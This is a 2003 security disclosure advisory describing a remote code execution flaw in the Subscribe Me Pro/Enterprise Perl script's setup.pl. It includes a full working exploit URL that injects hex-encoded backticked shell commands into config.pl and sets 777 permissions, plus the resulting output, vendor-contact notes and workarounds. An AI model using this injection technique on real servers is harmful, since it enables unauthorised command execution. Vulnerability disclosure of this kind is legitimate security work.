Subscribe Me Pro/Enterprise - Remote Code Execution via Backticked Perl Variable Injection.
Pimp industries.
"Its all about the Bling, Bitches and Fame!"
Subscribe Me Pro/Enterprise (All recent versions of Pro/Enterprise)
Remote Code Execution via Backticked Perl Variable Injection.
(C) Paul Craig
Pimp Industries 2003
This advisory is also online at: http://www.pimp-industries.com/pimp-0003.txt
Background
-------------
Subscribe me Pro/Enterprise is a mailing list management script developed
by siteinteractive.
(http://www.siteinteractive.com)
Various flaws exist in setup.pl that can allow an attacker to inject shell
commands using a backticked
variable injection flaw into config.pl, then exploiting a seccond flaw to
create config.pl with permissions of 777. Then run the injected shell
commands.
Exploit:
------------
This attack fools setup.pl into thinking that you have just installed
subscribe me and wish to set it up.
When doing this setup.pl will attempt to write all your configuration
variables to config.pl.
There is some input validation done in setup.pl, but this can be easily
bypassed by hex encoding all data that you send.
Run though of the exploit:
Firstly we connect and inject our exploit command of '/usr/bin/id > id'
and tell setup.pl to create all files with a mode of 777.
http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.
This will return a page saying "Please set your administration password"
(you wont be able to).
This has now written the following data to config.pl
$notification = "" .`/usr/bin/id > id` . ""; (note the backticks)
And config.pl is now set to -rwxrwxrwx.
Now we request http://victim.com/cgi-bin/config.pl to execute our perl.
And respectively http://victim.com/cgi-bin/id is now created.
uid=48(apache) gid=48(apache) groups=48(apache)
Using this exploit it is possible to inject any system commands.
Thats bad, very.
Company Status:
-------------
Company was contacted via email (support@) on Monday 15th December, they
were notified that the exploit would be released on the 19th of December,
and they were told how to fix the problem.
No reply was came back from the company, and no official fix has been
released.
Suggestions/Work Around:
-------------
Remove setup.pl once installed, also chmod config.pl to READ ONLY.
Company status
---------------
Pimp Industries is a privately owned security research company, if you are
intrested in any code auditing work done or would like to contact Pimp
Industries to discuss any nature of business, please email us at
headpimp@xxxxxxxxxxxxxxxxxxxx
Big Hellos to
-------------
Pinky, Kimathy, sozni, hx, decx and Santa (ive been really really good).
Paul Craig
Head Pimp , Security Researcher
Pimp Industries